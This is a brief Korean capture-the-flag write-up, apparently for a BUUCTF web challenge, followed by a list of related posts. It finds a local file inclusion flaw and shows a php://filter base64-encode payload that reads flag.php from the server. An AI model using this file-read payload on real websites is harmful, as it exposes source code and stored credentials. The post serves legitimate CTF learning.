음.. 뭔가 똥내가 킁킁
lfi(local file include) 취약점이 있는 페이지이다.
그럼 바로 flag.php를 가져와보면
얘가 나를 놀린다;
file 말고 php 스키마의 base64 encoding filter 기능을 사용해보자.
| /secr3t.php?file=php://filter/convert.base64-encode/resource=/var/www/html/flag.php |
'Web > BUUCTF' 카테고리의 다른 글
| [BUUCTF] - [0CTF 2016]piapiapia1 (0) | 2020.02.21 |
|---|---|
| [BUUCTF] - [RoarCTF 2019]Easy Java1 (0) | 2020.02.18 |
| [BUUCTF] - [网鼎杯 2018]Fakebook1 (0) | 2020.02.18 |
| [BUUCTF] - [De1CTF 2019]SSRF Me1 (0) | 2020.02.17 |
| [BUUCTF] - [极客大挑战 2019]EasySQL1 (0) | 2020.02.17 |